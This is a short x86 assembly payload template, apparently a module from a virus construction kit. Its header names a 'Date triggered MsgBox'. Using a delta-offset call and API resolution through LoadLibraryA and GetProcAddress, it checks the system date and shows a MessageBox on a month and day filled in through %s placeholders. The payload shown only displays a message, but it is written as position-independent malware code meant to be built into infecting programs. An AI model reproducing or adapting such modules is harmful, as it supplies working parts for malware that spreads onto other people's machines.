;%%%5 4 TMSG Date triggered MsgBox

;###LoadLibraryA
;###GetProcAddress
;###GetLocalTime
payload:
	pushad
	mov ebx,esp

;get date/time

	sub esp,8*2
	push esp
	call delta
	call [ebp+_GetLocalTime]
	movzx edx,wo [esp+2]
	movzx ecx,wo [esp+6]
	add esp,8*2

;check month

	sub edx,%s
	jnz @@done

;check day

	sub ecx,%s
	jnz @@done

;retrieve user32.dll base

	X_PUSH eax,USER32.DLL~
	push esp
  	call [ebp+_LoadLibraryA]

;get the api

	X_PUSH ecx,MessageBoxA~
	push esp
  	push eax
  	call [ebp+_GetProcAddress]

;call the API

  	X_PUSH ecx,%s~
  	mov ecx,esp
  	X_PUSH edx,%s~
  	mov edx,esp

	push 0
	push ecx
	push edx
	push 0
	call eax

  @@done:
	mov esp,ebx
	popad
	ret

